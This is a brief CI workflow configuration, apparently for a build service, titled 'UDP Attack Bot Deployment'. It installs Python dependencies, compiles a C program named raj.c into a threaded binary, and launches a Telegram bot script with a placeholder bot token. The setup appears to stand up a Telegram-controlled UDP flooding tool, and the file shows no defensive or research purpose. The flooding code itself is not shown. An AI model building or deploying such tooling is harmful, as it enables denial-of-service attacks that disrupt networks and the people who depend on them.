workflows:
  udp_attack_bot:
    name: UDP Attack Bot Deployment
    environment:
      vars:
        BOT_TOKEN: "YOUR_TELEGRAM_BOT_TOKEN"
    scripts:
      - pip3 install -r requirements.txt
      - gcc raj.c -o raja -pthread
      - pip3 install -r requirements.txt  && chmod +x raja && python3 bot.py
    artifacts:
      - "raja"
